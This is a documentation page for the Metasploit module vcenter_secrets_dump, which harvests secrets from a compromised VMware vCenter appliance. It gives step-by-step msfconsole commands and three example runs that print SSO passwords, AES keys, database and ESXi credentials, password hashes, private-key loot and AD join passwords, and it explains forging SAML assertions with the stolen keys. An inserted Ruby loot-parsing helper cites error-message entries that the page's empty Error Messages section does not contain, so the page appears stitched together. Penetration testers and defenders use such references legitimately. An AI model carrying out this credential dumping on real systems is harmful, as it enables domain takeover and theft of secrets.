VMware vCenter Secrets Dump - Metasploit
This page contains detailed information about how to use the post/linux/gather/vcenter_secrets_dump Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: VMware vCenter Secrets Dump
Module: post/linux/gather/vcenter_secrets_dump
Source code: modules/post/linux/gather/vcenter_secrets_dump.rb
Disclosure date: 2022-04-15
Last modification time: 2022-11-01 17:33:14 +0000
Supported architecture(s): -
Supported platform(s): Linux, Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: -
Grab secrets and keys from the vCenter server and add them to loot. This module is tested against the vCenter appliance only; it will not work on Windows vCenter instances. It is intended to be run after successfully acquiring root access on a vCenter appliance and is useful for penetrating further into the environment following a vCenter exploit that results in a root shell. Secrets include the dcAccountDN and dcAccountPassword for the vCenter machine, which can be used for manipulating the SSO domain via the standard LDAP interface; these are useful for plugging into the vmware_vcenter_vmdir_ldap module or for adding new SSO admin users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with their associated private keys are also plundered and can be used to sign forged SAML assertions for the /ui admin interface.
Module Ranking and Traits
Module Ranking:
- manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- artifacts-on-disk: Module leaves a payload or a dropper on the target machine.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/linux/gather/vcenter_secrets_dump
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/linux/gather/vcenter_secrets_dump
msf post(vcenter_secrets_dump) > show options
... show and set options ...
msf post(vcenter_secrets_dump) > set SESSION session-id
msf post(vcenter_secrets_dump) > exploit
If you wish to run the post module against all sessions in the framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/linux/gather/vcenter_secrets_dump")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on
Knowledge Base
Vulnerable Application
Grab secrets and keys from the vCenter server and add them to loot. Secrets include the dcAccountDN and dcAccountPassword for the vCenter machine, which can be used for manipulating the SSO domain via the standard LDAP interface; these are useful for plugging into the vmware_vcenter_vmdir_ldap module or for adding new SSO admin users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with their associated private keys are also plundered and can be used to sign forged SAML assertions for the /ui admin interface.
This module is tested against the vCenter appliance only; it will not work on Windows vCenter instances. It is intended to be run after successfully acquiring root access on a vCenter appliance and is useful for penetrating further into the environment following a vCenter exploit that results in a root shell. This module has been tested against vCenter appliance versions 7.0 and 6.7 but will probably work against other versions of the vCenter appliance.
Verification Steps
This is a post module and requires a meterpreter or shell session on the vCenter appliance with root access.
- Start msfconsole
- Get a root session on the vCenter appliance via an exploit of your choice and background it
- Do:
use post/linux/gather/vcenter_secrets_dump
- Do:
set session <session>
- Do:
dump
Advanced Options
DUMP_VMDIR
Boolean value that controls whether the module will attempt to extract vSphere SSO domain information, including SSO user hashes and a complete LDIF dump of the SSO directory. Defaults to true.
DUMP_VMAFD
Boolean value that controls whether the module will attempt to extract vSphere certificates, private keys, and secrets. Defaults to true.
DUMP_SPEC
If DUMP_VMAFD is also true, attempt to extract VM Guest Customization secrets from PSQL using the DATA-ENCIPHERMENT key extracted from VMAFD. Defaults to true.
Scenarios
Example run from a Meterpreter session on a vCenter appliance, version 7.0 U3d
msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > dump
[*] vSphere Hostname and IPv4: vcenterdelta.cesium137.io [192.168.100.70]
[*] VMware VirtualCenter 7.0.3 build-19480866
[*] Embedded Platform Service Controller
[*] Gathering vSphere SSO domain information ...
[+] vSphere SSO DC DN: cn=vcenterdelta.cesium137.io,ou=Domain Controllers,dc=delta,dc=vsphere,dc=local
[+] vSphere SSO DC PW: *6{ K3Ei*@<J[.gd5c3o
[*] Extract vmdird tenant AES encryption key ...
[+] vSphere Tenant AES encryption
KEY: K-Z(x7wf35{E"I2v
HEX: 4b2d5a287837776633357b4522493276
[*] Extract vmware-vpx AES key ...
[+] vSphere vmware-vpx AES encryption
HEX: 9927ed2d42b80f9d3eec8e77441c63360c0c7bbed48076ff884efcfd27ef0682
[*] Extracting PostgreSQL database credentials ...
[+] VCDB Name: VCDB
[+] VCDB User: vc
[+] VCDB Pass: 6!24A3W5LekCOPK=
[*] Extract ESXi host vpxuser credentials ...
[+] ESXi Host esxi01d.cesium137.io [192.168.100.101] LOGIN: vpxuser PASS: 3be=IDc}11FC8EJ1^JgBO]Bl7I8}^:]Z
[+] ESXi Host esxi02d.cesium137.io [192.168.100.102] LOGIN: vpxuser PASS: 1gp0o7o[~/Fk^1bqm0K1K\YIl.VsgTK8
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF ...
[+] LDIF Dump: /home/cs137/.msf4/loot/20220504162039_default_192.168.100.70_vmdir_227362.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[+] vSphere SSO User Credential: CN=workload_storage_management-07afcee6-c2e2-4d0a-aa28-0305ab5825a4,cn=ServicePrincipals,dc=delta,dc=vsphere,dc=local:$dynamic_82$4bb329cd5a078c7b22b2f2bafd65f1c58e523d2d3f85ff75f51763d32c2769893a5fdb35e36e4217f1dcc9e10f1cfdaf495fdcc9ea5bf3fbfd8017bd57614d05$HEX$050a7a45b3ad8ee24a815b41c94b5fc9
[+] vSphere SSO User Credential: cn=vcenterdelta.cesium137.io,ou=Domain Controllers,dc=delta,dc=vsphere,dc=local:$dynamic_82$d857c278b1dfa799e293f0f35551d29b01973c24ef9e2c0e079d09049826ca824757f8377e7646e003272a39ae459a66c5fca54ac76eb67ddc5d1133cb4c4628$HEX$4ae8badb536deab2c3be64d3a1dfeb2e
[+] vSphere SSO User Credential: CN=waiter-0ad33e8d-0ca0-4912-8eb0-0a80a16fda82,cn=users,dc=delta,dc=vsphere,dc=local:$dynamic_82$9a9dd8ec92a332b91b7602d45404a144973c75f54111ecf7cdfa70cea29e358838132f8380361091a40efdf52c5ac34cfd988574e489a83e2c1f1438c764bad0$HEX$2971d8fd5160de2e71a0dfa744af5d6b
[+] vSphere SSO User Credential: cn=krbtgt/DELTA.VSPHERE.LOCAL,cn=users,dc=DELTA,dc=VSPHERE,dc=LOCAL:$dynamic_82$41437d26f1d4c2cdc67cff7ec66f91da643cb4b331fc00fa052ace43e4eae7ef277f9b9b05d5c06c46f5b73bc2132ed772552274464098d2479604161a001d32$HEX$5a21a4b810348c78f9997a3c405f3340
[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=DELTA,dc=VSPHERE,dc=LOCAL:$dynamic_82$aa0ef201580566738898162a079c70daa0bb19be0927d6b44ac3d65724df1e14cd6c273c132cd117b98ed8c7b37d2ae861d96e6ff28e97e81f54629072a83e62$HEX$031df0af1964ea1e5c733541f2f89a7d
[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=delta,dc=vsphere,dc=local:$dynamic_82$cd4362341bb01e2de096c262c59e3c6f8bedf78ae96f378de57e369d5071f114fba4c43c4d577317ea3d923eafa9b9a6f6154a10d0e81f7fa00fb711b3519a8c$HEX$0155fb261f868fbf8f3feda9139acc50
[+] vSphere SSO User Credential: cn=vmca/[email protected],cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$b478eb780a9f43960541a236b4f258bf9d7726f76d6f9d13f25fc815bac002b191be96a90c87bf607b54e13769878b5863cde7eb12b151db5c5892e9b00e5f48$HEX$a56c39678fd290619f726e31c5d6fce8
[+] vSphere SSO User Credential: cn=ldap/[email protected],cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$efeb6777719ccb7278a6c216e3a307bc0a4a9ecbf240a36a6947161dbd44e143cb8fa9712f2629e7022bb2bcdf3c144b7ecbbc499f15dd3791e920205ec7fcba$HEX$bb3eddcba08bf93c372f23a45c5fb651
[+] vSphere SSO User Credential: cn=DNS/[email protected],cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$059761db3117ce52c864cf5dab7b6320f47d0e09c1ff3afaa0835fe4775aa0669a09ee26412e15bfc8337a9747e73e4ffab1859292e716dba0e92104708332a6$HEX$4629f7e9c587f6d1b57b2f56e96bf05a
[+] vSphere SSO User Credential: cn=host/[email protected],cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$6b11a2b58752e8409f57bc72b45e6599209714000b8a17e95d661663d54d691ce013be2700fa6c8e30e6d98259d1810c5f883fcc8099bd16342e6a4c0d179895$HEX$2a14a8f480ca071f6edffd3720732d5d
[*] Processing SSO identity sources ...
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://vcenterdelta.cesium137.io:389:
[+] SSOUSER: [email protected]
[+] SSOPASS: *6{ K3Ei*@<J[.gd5c3o
[+] SSODOMAIN: delta.vsphere.local
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_LDAP_WITH_AD_MAPPING @ ldap://cesium137.io:
[+] SSOUSER: CESIUM137\ldap
[+] SSOPASS: ThisIsSecret!
[+] SSODOMAIN: cesium137.io
[*] Extracting certificates from vSphere platform ...
[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220504162042_default_192.168.100.70_vmca_603049.key
[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220504162042_default_192.168.100.70_vmca_882434.pem
[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220504162044_default_192.168.100.70_idp_836918.key
[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220504162044_default_192.168.100.70_idp_500987.pem
[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220504162046_default_192.168.100.70___MACHINE_CERT_032048.key
[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220504162047_default_192.168.100.70___MACHINE_CERT_559717.pem
[+] MACHINE key: /home/cs137/.msf4/loot/20220504162050_default_192.168.100.70_machine_503081.key
[+] MACHINE cert: /home/cs137/.msf4/loot/20220504162051_default_192.168.100.70_machine_646697.pem
[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220504162052_default_192.168.100.70_vspherewebclien_812043.key
[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220504162053_default_192.168.100.70_vspherewebclien_959067.pem
[+] VPXD key: /home/cs137/.msf4/loot/20220504162055_default_192.168.100.70_vpxd_194878.key
[+] VPXD cert: /home/cs137/.msf4/loot/20220504162056_default_192.168.100.70_vpxd_153814.pem
[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220504162057_default_192.168.100.70_vpxdextension_878062.key
[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220504162058_default_192.168.100.70_vpxdextension_623838.pem
[+] HVC key: /home/cs137/.msf4/loot/20220504162100_default_192.168.100.70_hvc_452066.key
[+] HVC cert: /home/cs137/.msf4/loot/20220504162100_default_192.168.100.70_hvc_307290.pem
[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220504162102_default_192.168.100.70_dataenciphermen_478118.key
[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220504162103_default_192.168.100.70_dataenciphermen_345609.pem
[+] SMS key: /home/cs137/.msf4/loot/20220504162105_default_192.168.100.70_sms_self_signed_858005.key
[+] SMS cert: /home/cs137/.msf4/loot/20220504162106_default_192.168.100.70_sms_self_signed_095121.pem
[+] WCP key: /home/cs137/.msf4/loot/20220504162108_default_192.168.100.70_wcp_982089.key
[+] WCP cert: /home/cs137/.msf4/loot/20220504162108_default_192.168.100.70_wcp_984591.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[*] Processing vpx_customization_spec 'Good Win10 Template with Local and Domain Join' ...
[*] Validating data encipherment key ...
[*] Initial administrator account password found for vpx_customization_spec 'Good Win10 Template with Local and Domain Join':
[+] Initial Admin PW: SamIAm!
[*] AD domain join account found for vpx_customization_spec 'Good Win10 Template with Local and Domain Join':
[+] AD User: [email protected]
[+] AD Pass: IAmSam!
[*] Processing vpx_customization_spec 'Borked Win10 Template' ...
[*] Validating data encipherment key ...
[!] Could not associate encryption public key with any of the private keys extracted from vCenter, skipping
[*] Processing vpx_customization_spec 'Good Win10 Template with Local' ...
[*] Validating data encipherment key ...
[*] Initial administrator account password found for vpx_customization_spec 'Good Win10 Template with Local':
[+] Initial Admin PW: SamIAm!
[*] Post module execution completed
msf6 post(linux/gather/vcenter_secrets_dump) >
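The credential and key lines in the run above follow fixed formats that the module checks before reporting them (the hash-length, salt-length and tenant AES key size entries under Error Messages below). The following Ruby helpers are an added example, not code from the module, that apply the same checks to recovered output so a responder can inventory which SSO accounts need rotation; SAMPLE_LOOT is constructed, and the key values in the comments are taken from the runs on this page.

```ruby
# Added example, not part of the vcenter_secrets_dump module: helpers that
# apply the module's own format checks to the two kinds of secret shown in the
# scenario output, so recovered loot can be inventoried for credential rotation.
require 'base64'

# One "vSphere SSO User Credential" line has the shape
#   <DN>:$dynamic_82$<128 hex digits>$HEX$<32 hex digits>
DYNAMIC_82_RE = /\A(?<dn>.+?):\$dynamic_82\$(?<hash>\h+)\$HEX\$(?<salt>\h+)\z/

# Parse a credential line into { dn:, hash:, salt: }, enforcing the same length
# checks the module reports ("hash length is not 128 digits", "salt length is
# not 32 digits"). Raises ArgumentError for anything malformed.
def parse_sso_credential(line)
  m = DYNAMIC_82_RE.match(line.strip)
  raise ArgumentError, 'not a $dynamic_82$ credential line' unless m
  raise ArgumentError, "hash length is not 128 digits (#{m[:dn]})" unless m[:hash].length == 128
  raise ArgumentError, "salt length is not 32 digits (#{m[:dn]})" unless m[:salt].length == 32
  { dn: m[:dn], hash: m[:hash].downcase, salt: m[:salt].downcase }
end

# Normalise the vmdird tenant AES key. The module accepts either 16 raw bytes
# or 24 Base64 characters that decode to 16 bytes, and prints the key as the
# 32-digit HEX value seen in the output; this returns that hex string.
def tenant_aes_key_hex(key)
  raw = case key.bytesize
        when 16 then key.b
        when 24 then Base64.strict_decode64(key)
        else
          raise ArgumentError,
                "Invalid tenant AES encryption key size - expecting 16 raw bytes or 24 Base64 bytes, got #{key.bytesize}"
        end
  raise ArgumentError, 'Base64 key did not decode to 16 bytes' unless raw.bytesize == 16
  raw.unpack1('H*')
end

# Constructed sample of module output (not a real dump): one well-formed
# credential line and one with a truncated hash that must be reported, not used.
SAMPLE_LOOT = <<~LOOT
  [*] Processing SSO account hashes ...
  [+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=example,dc=vsphere,dc=local:$dynamic_82$#{'a' * 128}$HEX$#{'b' * 32}
  [+] vSphere SSO User Credential: cn=krbtgt/EXAMPLE.VSPHERE.LOCAL,cn=users,dc=EXAMPLE,dc=VSPHERE,dc=LOCAL:$dynamic_82$#{'c' * 127}$HEX$#{'d' * 32}
  [*] Processing SSO identity sources ...
LOOT

# Walk module output and return { exposed: [DNs with valid hashes],
# malformed: [error messages] } so every exposed account can be rotated.
def inventory_exposed_accounts(loot_text)
  marker = 'vSphere SSO User Credential: '
  result = { exposed: [], malformed: [] }
  loot_text.each_line do |l|
    next unless l.include?(marker)
    begin
      result[:exposed] << parse_sso_credential(l.split(marker, 2).last)[:dn]
    rescue ArgumentError => e
      result[:malformed] << e.message
    end
  end
  result
end

if __FILE__ == $PROGRAM_NAME
  # KEY line from the 7.0 U3d run: prints 4b2d5a287837776633357b4522493276
  puts tenant_aes_key_hex('K-Z(x7wf35{E"I2v')
  p inventory_exposed_accounts(SAMPLE_LOOT)
end
```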
Example run from a Meterpreter session on a vCenter appliance, version 6.0 U3j
msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > dump
[*] vSphere Hostname and IPv4: vcenteralpha.cesium137.io [192.168.100.60]
[*] VMware VirtualCenter 6.0.0 build-14510547
[*] Embedded Platform Service Controller
[*] Gathering vSphere SSO domain information ...
[+] vSphere SSO DC DN: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local
[+] vSphere SSO DC PW: <PMW{T:4mnb@UBs/$f(w
[*] Extract vmdird tenant AES encryption key ...
[+] vSphere Tenant AES encryption
KEY: (>d%>D3'i@rAj}!"
HEX: 283e64253e443327694072416a7d2122
[*] Extract vmware-vpx AES key ...
[+] vSphere vmware-vpx AES encryption
HEX: acdeb90515681eb8c357e3a94312106934f174324c39d1deb012337effc124de
[*] Extracting PostgreSQL database credentials ...
[+] VCDB Name: VCDB
[+] VCDB User: vc
[+] VCDB Pass: 4yFcqZ2$m^&H<K?z
[*] Extract ESXi host vpxuser credentials ...
[!] No ESXi hosts attached to this vCenter system
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF ...
[+] LDIF Dump: /home/cs137/.msf4/loot/20220504162417_default_192.168.100.60_vmdir_757761.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[+] vSphere SSO User Credential: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local:$dynamic_82$95fe2a1c250329ff99f3ebf364a58f1ee4263560c30c8010c9774b4f5bf151ef3df4b378ab88a2e3629f714ed1b0060f3ae10b7bd7533d025f47d33542bf8ade$HEX$28d03ba88a83c83ae1d999b77259670c
[+] vSphere SSO User Credential: CN=waiter 514f2778-d8c0-49aa-a10b-1951699cc8c6,cn=users,dc=alpha,dc=vsphere,dc=local:$dynamic_82$495c53a6dd4b813638608feb0b4a1b27045d41e36e798c68ebdb312edc2f16c77d780c2b4fc6bed438cfd0ef743f1c1e0363692bd2c195371c2d4dd0b9862f39$HEX$b74fe42af9579d6c5536a50872c9eedf
[+] vSphere SSO User Credential: cn=krbtgt/ALPHA.VSPHERE.LOCAL,cn=users,dc=ALPHA,dc=VSPHERE,dc=LOCAL:$dynamic_82$1c01a034aadd563bea5be04b9e74dbc5bb9ac37694f58bda6eea0e83df97bc64e5fdf932991a9bcaaf82da6300542e8d8d51c16282e9aaa08da2c6c65a8b7cdc$HEX$2434b5c538e31bb3854bcd277a5f63ab
[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=ALPHA,dc=VSPHERE,dc=LOCAL:$dynamic_82$525d688d4614db9939ffdba8e41e76bc3bd473b0cc4fdeac0994042d3a5a7adc9c8e46040c846d6c7f449f7f94f9d3370cc554ab668dcd3d1006ca38a60fb70d$HEX$fd6001dd5be548498d94bf08641d657d
[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=alpha,dc=vsphere,dc=local:$dynamic_82$3a4fc4fbacbc6d10e4787383841ebc38fc20ebbb7780692ee0c5fa4b1a2bd675b7c41e8604f4a0eba9546993b971790115279281a108e6e21f4b83740fae449f$HEX$db1d08918cc2eb7bb372545b449643ca
[+] vSphere SSO User Credential: cn=vmca/[email protected],cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$6d7a381d442a674bcc730604160c6963adc937a45a14b9d8e750b55fd3500e54c1bd739968a611a63f747db0ebbe8d31f0d96e5b84a2d72c3c79f922e922adc7$HEX$68fbf3edaba87c972f2423d670377cd7
[+] vSphere SSO User Credential: cn=ldap/[email protected],cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$f584f632b79113f1a5f31d0d8e1df094438fd1644140fd3692a880e4c3ddb8a25969a71ec0e10b31c61aa256217cc0e4c014a21350645b2a3fb7327d0ee5f96a$HEX$9cfee2bcd297134f1d5a921c20f373e8
[+] vSphere SSO User Credential: cn=host/[email protected],cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$ac83726dabc4a021b7737b1e696eba9067e73fc8058e719733b2f4ebded115ae653dd75f13ec26b6a641986c772b20bf37be999c9978d220e94f1d0eeab9d3b8$HEX$91dae8ef6feae8880dd9708664040598
[*] Processing SSO identity sources ...
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
[+] SSOUSER: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,DC=alpha,DC=vsphere,DC=local
[+] SSOPASS: <PMW{T:4mnb@UBs/$f(w
[+] SSODOMAIN: alpha.vsphere.local
[*] Extracting certificates from vSphere platform ...
[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220504162419_default_192.168.100.60_vmca_525753.key
[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220504162419_default_192.168.100.60_vmca_840227.pem
[!] vmwSTSPrivateKey was not found in vmdir, checking for legacy ssoserverSign key PEM files ...
[-] Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM
[!] Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work
[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220504162421_default_192.168.100.60_idp_482598.key
[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220504162421_default_192.168.100.60_idp_805228.pem
[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220504162424_default_192.168.100.60___MACHINE_CERT_193219.key
[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220504162424_default_192.168.100.60___MACHINE_CERT_071831.pem
[+] MACHINE key: /home/cs137/.msf4/loot/20220504162428_default_192.168.100.60_machine_480281.key
[+] MACHINE cert: /home/cs137/.msf4/loot/20220504162428_default_192.168.100.60_machine_368258.pem
[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220504162430_default_192.168.100.60_vspherewebclien_464390.key
[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220504162431_default_192.168.100.60_vspherewebclien_445076.pem
[+] VPXD key: /home/cs137/.msf4/loot/20220504162432_default_192.168.100.60_vpxd_397207.key
[+] VPXD cert: /home/cs137/.msf4/loot/20220504162433_default_192.168.100.60_vpxd_425995.pem
[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220504162435_default_192.168.100.60_vpxdextension_185899.key
[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220504162436_default_192.168.100.60_vpxdextension_485039.pem
[+] SMS key: /home/cs137/.msf4/loot/20220504162437_default_192.168.100.60_sms_self_signed_823426.key
[+] SMS cert: /home/cs137/.msf4/loot/20220504162438_default_192.168.100.60_sms_self_signed_711433.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[!] No vpx_customization_spec entries evident
[*] Post module execution completed
msf6 post(linux/gather/vcenter_secrets_dump) >
Example run from a Meterpreter session on a vCenter appliance, version 6.5 U3q, configured with an external PSC
msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > dump
[*] vSphere Hostname and IPv4: vctr01.cesium137.io [192.168.0.111]
[*] VMware VirtualCenter 6.5.0 build-18499837
[!] External Platform Service Controller: psc01.cesium137.io
[!] This module assumes embedded PSC, functionality will be limited
[*] Gathering vSphere SSO domain information ...
[+] vSphere SSO DC DN: cn=vctr01.cesium137.io,ou=Computers,dc=vsphere,dc=local
[+] vSphere SSO DC PW: *Pz[aO0Udli"%mbt%`Gn
[*] Extract vmware-vpx AES key ...
[+] vSphere vmware-vpx AES encryption
HEX: db5beca47d9bb7af5da5278aeeee4b0a83076670736c46546f77a1ddfbe54f2e
[*] Extracting PostgreSQL database credentials ...
[+] VCDB Name: VCDB
[+] VCDB User: vc
[+] VCDB Pass: cq1=+*f(gTQZ_6)Y
[*] Extract ESXi host vpxuser credentials ...
[+] ESXi Host esxi01.cesium137.io [192.168.0.101] LOGIN: vpxuser PASS: 13M\.3LCb36n8:=_847HzS}U:c9@d65=
[+] ESXi Host esxi02.cesium137.io [192.168.0.102] LOGIN: vpxuser PASS: -0fQviFI0f}C@8:v3y[jP[\C{lqU8.kL
[+] ESXi Host esxi03.cesium137.io [192.168.0.103] LOGIN: vpxuser PASS: .TB4/OEr3H^pM.kj4a^-]0Z:_TWl{=_H
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF ...
[+] LDIF Dump: /home/cs137/.msf4/loot/20220505083154_default_192.168.0.111_vmdir_383063.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[!] No password hashes found
[*] Processing SSO identity sources ...
[!] No SSO ID provider information found
[*] Extracting certificates from vSphere platform ...
[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220505083156_default_192.168.0.111___MACHINE_CERT_323341.key
[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220505083156_default_192.168.0.111___MACHINE_CERT_255826.pem
[+] MACHINE key: /home/cs137/.msf4/loot/20220505083158_default_192.168.0.111_machine_248465.key
[+] MACHINE cert: /home/cs137/.msf4/loot/20220505083159_default_192.168.0.111_machine_130920.pem
[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220505083200_default_192.168.0.111_vspherewebclien_019114.key
[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220505083201_default_192.168.0.111_vspherewebclien_777853.pem
[+] VPXD key: /home/cs137/.msf4/loot/20220505083202_default_192.168.0.111_vpxd_846784.key
[+] VPXD cert: /home/cs137/.msf4/loot/20220505083202_default_192.168.0.111_vpxd_796349.pem
[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220505083204_default_192.168.0.111_vpxdextension_570408.key
[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220505083204_default_192.168.0.111_vpxdextension_490761.pem
[+] SMS key: /home/cs137/.msf4/loot/20220505083206_default_192.168.0.111_sms_self_signed_278681.key
[+] SMS cert: /home/cs137/.msf4/loot/20220505083206_default_192.168.0.111_sms_self_signed_163386.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[*] Processing vpx_customization_spec 'Windows 2019 Datacenter' ...
[*] Validating data encipherment key ...
[*] Initial administrator account password found for vpx_customization_spec 'Windows 2019 Datacenter':
[+] Initial Admin PW: IAmSam!
[*] AD domain join account found for vpx_customization_spec 'Windows 2019 Datacenter':
[+] AD User: [email protected]
[+] AD Pass: Gr33n3gg$!
[*] Post module execution completed
Msfconsole Usage
Here is how the linux/gather/vcenter_secrets_dump post exploitation module looks in the msfconsole:
msf6 > use post/linux/gather/vcenter_secrets_dump
msf6 post(linux/gather/vcenter_secrets_dump) > show info
Name: VMware vCenter Secrets Dump
Module: post/linux/gather/vcenter_secrets_dump
Platform: Linux, Unix
Arch:
Rank: Manual
Disclosed: 2022-04-15
Provided by:
npm <[email protected]>
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Compatible session types:
Meterpreter
Shell
Available actions:
Name Description
---- -----------
Dump Dump vCenter Secrets
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SESSION                   yes       The session to run this module on
Description:
Grab secrets and keys from the vCenter server and add them to loot.
This module is tested against the vCenter appliance only; it will
not work on Windows vCenter instances. It is intended to be run
after successfully acquiring root access on a vCenter appliance and
is useful for penetrating further into the environment following a
vCenter exploit that results in a root shell. Secrets include the
dcAccountDN and dcAccountPassword for the vCenter machine which can
be used for maniuplating the SSO domain via standard LDAP interface;
good for plugging into the vmware_vcenter_vmdir_ldap module or for
adding new SSO admin users. The MACHINE_SSL, VMCA_ROOT and SSO IdP
certificates with associated private keys are also plundered and can
be used to sign forged SAML assertions for the /ui admin interface.
Module Options
This is a complete list of options available in the linux/gather/vcenter_secrets_dump post exploitation module:
msf6 post(linux/gather/vcenter_secrets_dump) > show options
Module options (post/linux/gather/vcenter_secrets_dump):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SESSION                   yes       The session to run this module on
Post action:
Name Description
---- -----------
Dump Dump vCenter Secrets
Advanced Options
Here is a complete list of advanced options supported by the linux/gather/vcenter_secrets_dump post exploitation module:
msf6 post(linux/gather/vcenter_secrets_dump) > show advanced
Module advanced options (post/linux/gather/vcenter_secrets_dump):
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
DUMP_LIC    false            yes       If DUMP_VMDIR is enabled, attempt to extract vSphere license keys
DUMP_SPEC   true             yes       If DUMP_VMAFD is enabled, attempt to extract VM Guest Customization secrets from PSQL
DUMP_VMAFD  true             yes       Extract vSphere certificates, private keys, and secrets
DUMP_VMDIR  true             yes       Extract SSO domain information
VERBOSE     false            no        Enable detailed status messages
WORKSPACE                    no        Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the linux/gather/vcenter_secrets_dump module can do:
msf6 post(linux/gather/vcenter_secrets_dump) > show actions
Post actions:
Name Description
---- -----------
Dump Dump vCenter Secrets
Evasion Options
Here is the full list of possible evasion options supported by the linux/gather/vcenter_secrets_dump post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(linux/gather/vcenter_secrets_dump) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
